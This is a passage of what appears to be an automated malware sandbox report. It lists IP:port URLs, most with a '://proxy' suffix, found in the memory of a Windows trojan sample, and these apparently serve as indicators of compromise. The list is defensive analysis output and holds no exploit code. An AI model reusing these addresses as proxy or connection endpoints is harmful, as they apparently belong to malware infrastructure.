                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.97.150.167:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.97.176.112:11793
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.97.176.112:11793://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6684000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.165.117.173:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.165.117.173:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.209.236.26
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.209.236.26://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.209.236.26:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.211.113.34
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.211.113.34://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.211.113.34:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.211.113.36
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.211.113.36://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C810E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.245.51.230:9898
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.245.51.230:9898://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.61.216.63:60808
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.61.216.63:60808://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.87.125.146:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.87.125.146:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.95.145.226:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.95.145.226:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.128.96.206
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.128.96.206://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.128.96.206:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C91B9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.174.105.18:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.174.105.18:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.174.114.225:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.174.114.225:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8DCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.222.252.187
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8DEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.222.252.187://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.222.252.187:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.222.252.187:8193
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.222.252.187:8193://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.222.252.187:8197
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.222.252.187:8197://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C90C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.234.125.3:443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.234.125.3:443://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.253.24.57:3333
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C784B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.253.24.57:3333://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.43.214.205
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.43.214.205://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.43.214.205:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAC25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.78.35.26
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.78.35.26://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.78.35.26:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8098000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7ED3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.187.185:34405
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.187.185:34405://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.189:34405
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.189:34405://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.193:34409
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.193:34409://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.195:34411
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.195:34411://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.198:34405
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.198:34405://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.202:34409
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.202:34409://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.204:34411
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.204:34411://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.207:34405
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.207:34405://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.213:34411
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.213:34411://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.216:34405
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.216:34405://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.220:34409
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.220:34409://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.222:34411
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.222:34411://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9581000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C90A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.112.120.252:45555
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C90A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.112.120.252:45555://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.112.127.20:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.112.127.20:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.115.232.79:10800
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.115.232.79:10800://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.115.232.79:31280
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.115.232.79:31280://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.127.93.185:8081
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.127.93.185:8081://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBBA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.129.42.252:60111
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBBA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.129.42.252:60111://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.174.242.114:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.174.242.114:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.192.31.37:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.192.31.37:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6577000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.200.149.242:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.200.149.242:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.200.161.241:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.200.161.241:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.200.74.139:1685
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.200.74.139:1685://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC6B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.23.175.80:8443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.23.175.80:8443://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.231.230.141:18500
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.231.230.141:18500://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.252.66.209:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.252.66.209:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.252.73.23:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.252.73.23:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.3.112.128:35860
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.3.112.128:35860://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.31.100.138:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.31.100.138:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.33.238.18:8111
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.33.238.18:8111://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.42.99.22:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.42.99.22:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.5.132.74:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.5.132.74:5678://proxy0k&
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A72000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.50.19.150:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.50.19.150:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.77.163.196:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.77.163.196:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C76FF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7715000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.137.150:13716
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C770F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.137.150:13716://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA9E6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA9C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.137.30:28629
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA9C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.137.30:28629://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.138.172:48217
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.138.172:48217://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C82D0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.142.131:48046
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.142.131:48046://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.142.145:52920
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.142.145:52920://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C768B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.143.147:50901
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C768B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.143.147:50901://proxy
